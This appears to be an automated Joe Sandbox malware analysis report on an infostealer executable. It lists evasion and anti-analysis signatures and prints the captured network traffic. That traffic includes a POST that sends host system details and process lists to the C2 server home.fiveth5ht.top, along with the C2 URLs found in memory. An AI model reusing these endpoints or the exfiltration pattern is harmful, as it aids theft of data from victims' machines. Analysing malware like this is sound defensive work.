Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
BkB1ur7aFW.exe

Overview

General Information

Sample name:BkB1ur7aFW.exe
renamed because original name is a hash value
Original sample name:5fad6c65b553ca73463694390e2f9301.exe
Analysis ID:1581386
MD5:5fad6c65b553ca73463694390e2f9301
SHA1:7a624d02450205c7a89d6397979486873b47be39
SHA256:bad2c4c499a3bb89e8098f5fe7b43cdb248d6e70bb23a07de1ebb83fac880175
Tags:exeuser-abuse_ch
Infos:

Detection

Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Detected unpacking (changes PE section rights)
Multi AV Scanner detection for submitted file
AI detected suspicious sample
Hides threads from debuggers
Infostealer behavior detected
Leaks process information
Machine Learning detection for sample
PE file contains section with special chars
Potentially malicious time measurement code found
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
AV process strings found (often used to terminate AV products)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Detected potential crypto function
Entry point lies outside standard sections
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • BkB1ur7aFW.exe (PID: 7292 cmdline: "C:\Users\user\Desktop\BkB1ur7aFW.exe" MD5: 5FAD6C65B553CA73463694390E2F9301)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

No yara matches

Sigma Signatures

No Sigma rule has matched

Suricata Signatures

No Suricata rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Antivirus / Scanner detection for submitted sample
Source: BkB1ur7aFW.exeAvira: detected
Multi AV Scanner detection for submitted file
Source: BkB1ur7aFW.exeReversingLabs: Detection: 47%
AI detected suspicious sample
Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
Machine Learning detection for sample
Source: BkB1ur7aFW.exeJoe Sandbox ML: detected
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeCode function: -----BEGIN PUBLIC KEY-----0_2_0041DCF0
Source: BkB1ur7aFW.exeBinary or memory string: -----BEGIN PUBLIC KEY-----
Source: BkB1ur7aFW.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeCode function: 0_2_003F255D GetSystemInfo,GlobalMemoryStatusEx,GetDriveTypeA,GetDiskFreeSpaceExA,KiUserCallbackDispatcher,FindFirstFileW,FindNextFileW,K32EnumProcesses,0_2_003F255D
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeCode function: 0_2_003F29FF FindFirstFileA,RegOpenKeyExA,CharUpperA,CreateToolhelp32Snapshot,QueryFullProcessImageNameA,CloseHandle,CreateToolhelp32Snapshot,CloseHandle,0_2_003F29FF
Source: global trafficHTTP traffic detected: GET /ip HTTP/1.1Host: httpbin.orgAccept: */*
Source: global trafficHTTP traffic detected: POST /OyKvQKriwnyyWjwCxSXF1735186862 HTTP/1.1Host: home.fiveth5ht.topAccept: */*Content-Type: application/jsonContent-Length: 444891Data Raw: 7b 20 22 69 70 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 2c 20 22 63 75 72 72 65 6e 74 5f 74 69 6d 65 22 3a 20 22 38 35 33 32 39 31 35 34 35 38 33 31 37 31 33 36 32 30 36 22 2c 20 22 4e 75 6d 5f 70 72 6f 63 65 73 73 6f 72 22 3a 20 34 2c 20 22 4e 75 6d 5f 72 61 6d 22 3a 20 37 2c 20 22 64 72 69 76 65 72 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 43 3a 5c 5c 22 2c 20 22 61 6c 6c 22 3a 20 32 32 33 2e 30 2c 20 22 66 72 65 65 22 3a 20 31 36 38 2e 30 20 7d 20 5d 2c 20 22 4e 75 6d 5f 64 69 73 70 6c 61 79 73 22 3a 20 31 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 78 22 3a 20 31 32 38 30 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 79 22 3a 20 31 30 32 34 2c 20 22 72 65 63 65 6e 74 5f 66 69 6c 65 73 22 3a 20 32 36 2c 20 22 70 72 6f 63 65 73 73 65 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 5b 53 79 73 74 65 6d 20 50 72 6f 63 65 73 73 5d 22 2c 20 22 70 69 64 22 3a 20 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 53 79 73 74 65 6d 22 2c 20 22 70 69 64 22 3a 20 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 52 65 67 69 73 74 72 79 22 2c 20 22 70 69 64 22 3a 20 39 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 6d 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 33 32 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 63 73 72 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 30 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 77 69 6e 69 6e 69 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 38 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 63 73 72 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 39 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 77 69 6e 6c 6f 67 6f 6e 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 35 35 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 65 72 76 69 63 65 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 36 32 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 6c 73 61 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 36 32 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 35 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 66 6f 6e 74 64 72 76 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 37 36 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 66 6f 6e 74 64 72 76 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 38 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 38 37 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 39 32 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 64 77 6d 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 39 38 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 33 36 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 33 35 36 20 7d 2c 2
Source: global trafficHTTP traffic detected: GET /OyKvQKriwnyyWjwCxSXF1735186862?argument=0 HTTP/1.1Host: home.fiveth5ht.topAccept: */*
Source: global trafficHTTP traffic detected: POST /OyKvQKriwnyyWjwCxSXF1735186862 HTTP/1.1Host: home.fiveth5ht.topAccept: */*Content-Type: application/jsonContent-Length: 31Data Raw: 7b 20 22 69 64 31 22 3a 20 22 30 22 2c 20 22 64 61 74 61 22 3a 20 22 44 6f 6e 65 31 22 20 7d Data Ascii: { "id1": "0", "data": "Done1" }
Source: Joe Sandbox ViewIP Address: 34.226.108.155 34.226.108.155
Source: Joe Sandbox ViewIP Address: 5.101.3.217 5.101.3.217
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeCode function: 0_2_003F7770 recv,0_2_003F7770
Source: global trafficHTTP traffic detected: GET /ip HTTP/1.1Host: httpbin.orgAccept: */*
Source: global trafficHTTP traffic detected: GET /OyKvQKriwnyyWjwCxSXF1735186862?argument=0 HTTP/1.1Host: home.fiveth5ht.topAccept: */*
Source: global trafficDNS traffic detected: DNS query: httpbin.org
Source: global trafficDNS traffic detected: DNS query: home.fiveth5ht.top
Source: unknownHTTP traffic detected: POST /OyKvQKriwnyyWjwCxSXF1735186862 HTTP/1.1Host: home.fiveth5ht.topAccept: */*Content-Type: application/jsonContent-Length: 444891Data Raw: 7b 20 22 69 70 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 2c 20 22 63 75 72 72 65 6e 74 5f 74 69 6d 65 22 3a 20 22 38 35 33 32 39 31 35 34 35 38 33 31 37 31 33 36 32 30 36 22 2c 20 22 4e 75 6d 5f 70 72 6f 63 65 73 73 6f 72 22 3a 20 34 2c 20 22 4e 75 6d 5f 72 61 6d 22 3a 20 37 2c 20 22 64 72 69 76 65 72 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 43 3a 5c 5c 22 2c 20 22 61 6c 6c 22 3a 20 32 32 33 2e 30 2c 20 22 66 72 65 65 22 3a 20 31 36 38 2e 30 20 7d 20 5d 2c 20 22 4e 75 6d 5f 64 69 73 70 6c 61 79 73 22 3a 20 31 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 78 22 3a 20 31 32 38 30 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 79 22 3a 20 31 30 32 34 2c 20 22 72 65 63 65 6e 74 5f 66 69 6c 65 73 22 3a 20 32 36 2c 20 22 70 72 6f 63 65 73 73 65 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 5b 53 79 73 74 65 6d 20 50 72 6f 63 65 73 73 5d 22 2c 20 22 70 69 64 22 3a 20 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 53 79 73 74 65 6d 22 2c 20 22 70 69 64 22 3a 20 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 52 65 67 69 73 74 72 79 22 2c 20 22 70 69 64 22 3a 20 39 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 6d 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 33 32 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 63 73 72 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 30 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 77 69 6e 69 6e 69 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 38 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 63 73 72 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 39 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 77 69 6e 6c 6f 67 6f 6e 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 35 35 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 65 72 76 69 63 65 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 36 32 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 6c 73 61 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 36 32 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 35 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 66 6f 6e 74 64 72 76 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 37 36 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 66 6f 6e 74 64 72 76 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 38 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 38 37 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 39 32 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 64 77 6d 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 39 38 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 33 36 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 33 35 36 20 7d 2c 2
Source: global trafficHTTP traffic detected: HTTP/1.1 404 NOT FOUNDServer: nginx/1.22.1Date: Fri, 27 Dec 2024 13:53:28 GMTContent-Type: text/html; charset=utf-8Content-Length: 207Connection: closeData Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 65 20 73 65 72 76 65 72 2e 20 49 66 20 79 6f 75 20 65 6e 74 65 72 65 64 20 74 68 65 20 55 52 4c 20 6d 61 6e 75 61 6c 6c 79 20 70 6c 65 61 73 65 20 63 68 65 63 6b 20 79 6f 75 72 20 73 70 65 6c 6c 69 6e 67 20 61 6e 64 20 74 72 79 20 61 67 61 69 6e 2e 3c 2f 70 3e 0a Data Ascii: <!doctype html><html lang=en><title>404 Not Found</title><h1>Not Found</h1><p>The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.</p>
Source: global trafficHTTP traffic detected: HTTP/1.1 404 NOT FOUNDServer: nginx/1.22.1Date: Fri, 27 Dec 2024 13:53:29 GMTContent-Type: text/html; charset=utf-8Content-Length: 207Connection: closeData Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 65 20 73 65 72 76 65 72 2e 20 49 66 20 79 6f 75 20 65 6e 74 65 72 65 64 20 74 68 65 20 55 52 4c 20 6d 61 6e 75 61 6c 6c 79 20 70 6c 65 61 73 65 20 63 68 65 63 6b 20 79 6f 75 72 20 73 70 65 6c 6c 69 6e 67 20 61 6e 64 20 74 72 79 20 61 67 61 69 6e 2e 3c 2f 70 3e 0a Data Ascii: <!doctype html><html lang=en><title>404 Not Found</title><h1>Not Found</h1><p>The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.</p>
Source: BkB1ur7aFW.exe, 00000000.00000002.2024461300.0000000000961000.00000040.00000001.01000000.00000003.sdmp, BkB1ur7aFW.exe, 00000000.00000003.1843607009.00000000073B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://.css
Source: BkB1ur7aFW.exe, 00000000.00000002.2024461300.0000000000961000.00000040.00000001.01000000.00000003.sdmp, BkB1ur7aFW.exe, 00000000.00000003.1843607009.00000000073B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://.jpg
Source: BkB1ur7aFW.exe, 00000000.00000003.1843607009.00000000073B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF17
Source: BkB1ur7aFW.exe, 00000000.00000002.2024461300.0000000000961000.00000040.00000001.01000000.00000003.sdmp, BkB1ur7aFW.exe, 00000000.00000002.2025901050.00000000016FE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF1735186862
Source: BkB1ur7aFW.exe, 00000000.00000003.1987530704.0000000001732000.00000004.00000020.00020000.00000000.sdmp, BkB1ur7aFW.exe, 00000000.00000002.2026953073.0000000001734000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF1735186862?argument=0
Source: BkB1ur7aFW.exe, 00000000.00000003.1987530704.0000000001732000.00000004.00000020.00020000.00000000.sdmp, BkB1ur7aFW.exe, 00000000.00000002.2026953073.0000000001734000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF1735186862?argument=0oot%
Source: BkB1ur7aFW.exe, 00000000.00000002.2024461300.0000000000961000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF1735186862http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxS
Source: BkB1ur7aFW.exe, 00000000.00000002.2025901050.00000000016FE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF1735186862j
Source: BkB1ur7aFW.exe, 00000000.00000002.2024461300.0000000000961000.00000040.00000001.01000000.00000003.sdmp, BkB1ur7aFW.exe, 00000000.00000003.1843607009.00000000073B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://html4/loose.dtd
Source: BkB1ur7aFW.exe, 00000000.00000003.1843607009.00000000073B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://curl.se/docs/alt-svc.html
Source: BkB1ur7aFW.exeString found in binary or memory: https://curl.se/docs/alt-svc.html#
Source: BkB1ur7aFW.exe, 00000000.00000003.1843607009.00000000073B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://curl.se/docs/hsts.html
Source: BkB1ur7aFW.exeString found in binary or memory: https://curl.se/docs/hsts.html#
Source: BkB1ur7aFW.exe, BkB1ur7aFW.exe, 00000000.00000002.2024461300.0000000000961000.00000040.00000001.01000000.00000003.sdmp, BkB1ur7aFW.exe, 00000000.00000003.1843607009.00000000073B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://curl.se/docs/http-cookies.html
Source: BkB1ur7aFW.exeString found in binary or memory: https://curl.se/docs/http-cookies.html#
Source: BkB1ur7aFW.exe, 00000000.00000002.2024461300.0000000000961000.00000040.00000001.01000000.00000003.sdmp, BkB1ur7aFW.exe, 00000000.00000003.1843607009.00000000073B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://httpbin.org/ip
Source: BkB1ur7aFW.exe, 00000000.00000002.2024461300.0000000000961000.00000040.00000001.01000000.00000003.sdmp, BkB1ur7aFW.exe, 00000000.00000003.1843607009.00000000073B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://httpbin.org/ipbefore
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443

System Summary

barindex
PE file contains section with special chars
Source: BkB1ur7aFW.exeStatic PE information: section name:
Source: BkB1ur7aFW.exeStatic PE information: section name: .idata
Source: BkB1ur7aFW.exeStatic PE information: section name:
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeCode function: 0_2_004BB1800_2_004BB180
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeCode function: 0_2_004005B00_2_004005B0
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeCode function: 0_2_00406FA00_2_00406FA0
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeCode function: 0_2_0077E0500_2_0077E050
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeCode function: 0_2_0077A0000_2_0077A000
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeCode function: 0_2_004010E60_2_004010E6
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeCode function: 0_2_004C00E00_2_004C00E0
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeCode function: 0_2_004562100_2_00456210
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeCode function: 0_2_004BC3200_2_004BC320
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeCode function: 0_2_0075D4300_2_0075D430
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeCode function: 0_2_004C04200_2_004C0420
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeCode function: 0_2_007635B00_2_007635B0
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeCode function: 0_2_003FE6200_2_003FE620
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeCode function: 0_2_004BC7700_2_004BC770
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeCode function: 0_2_007567300_2_00756730
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeCode function: 0_2_007817A00_2_007817A0
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeCode function: 0_2_007747800_2_00774780
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeCode function: 0_2_004A98800_2_004A9880
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeCode function: 0_2_004049400_2_00404940
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeCode function: 0_2_004AC9000_2_004AC900
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeCode function: 0_2_007499200_2_00749920
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeCode function: 0_2_003FA9600_2_003FA960
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeCode function: 0_2_00773A700_2_00773A70
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeCode function: 0_2_005C6AC00_2_005C6AC0
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeCode function: 0_2_00768BF00_2_00768BF0
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeCode function: 0_2_003FCBB00_2_003FCBB0
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeCode function: 0_2_00431BE00_2_00431BE0
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeCode function: 0_2_00761BD00_2_00761BD0
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeCode function: 0_2_00757CC00_2_00757CC0
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeCode function: 0_2_0077CC900_2_0077CC90
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeCode function: 0_2_00774D400_2_00774D40
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeCode function: 0_2_005B0D800_2_005B0D80
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeCode function: 0_2_00405DB00_2_00405DB0
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeCode function: 0_2_0076CD800_2_0076CD80
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeCode function: 0_2_0070AE300_2_0070AE30
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeCode function: 0_2_00403ED00_2_00403ED0
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeCode function: 0_2_00415EB00_2_00415EB0
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeCode function: 0_2_00414F700_2_00414F70
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeCode function: 0_2_004BEF900_2_004BEF90
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeCode function: 0_2_004B8F900_2_004B8F90
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeCode function: 0_2_00742F900_2_00742F90
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeCode function: String function: 003F73F0 appears 86 times
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeCode function: String function: 005CCBC0 appears 95 times
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeCode function: String function: 003F75A0 appears 530 times
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeCode function: String function: 00434FD0 appears 182 times
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeCode function: String function: 003FCAA0 appears 40 times
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeCode function: String function: 003F71E0 appears 42 times
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeCode function: String function: 005A7220 appears 88 times
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeCode function: String function: 00434F40 appears 174 times
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeCode function: String function: 0040CCD0 appears 38 times
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeCode function: String function: 004D44A0 appears 72 times
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeCode function: String function: 004350A0 appears 31 times
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeCode function: String function: 0040CD40 appears 40 times
Source: BkB1ur7aFW.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
Source: BkB1ur7aFW.exeStatic PE information: Section: gjdrirkr ZLIB complexity 0.9943839819813248
Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@1/0@8/2
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeCode function: 0_2_003F255D GetSystemInfo,GlobalMemoryStatusEx,GetDriveTypeA,GetDiskFreeSpaceExA,KiUserCallbackDispatcher,FindFirstFileW,FindNextFileW,K32EnumProcesses,0_2_003F255D
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeCode function: 0_2_003F31D7 CreateToolhelp32Snapshot,CloseHandle,0_2_003F31D7
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeMutant created: \Sessions\1\BaseNamedObjects\My_mutex
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: BkB1ur7aFW.exeReversingLabs: Detection: 47%
Source: BkB1ur7aFW.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: BkB1ur7aFW.exeString found in binary or memory: Unable to complete request for channel-process-startup
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeSection loaded: winmm.dllJump to behavior
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeSection loaded: dhcpcsvc6.dllJump to behavior
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeSection loaded: dhcpcsvc.dllJump to behavior
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeSection loaded: napinsp.dllJump to behavior
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeSection loaded: pnrpnsp.dllJump to behavior
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeSection loaded: wshbth.dllJump to behavior
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeSection loaded: nlaapi.dllJump to behavior
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeSection loaded: winrnr.dllJump to behavior
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeSection loaded: uxtheme.dllJump to behavior
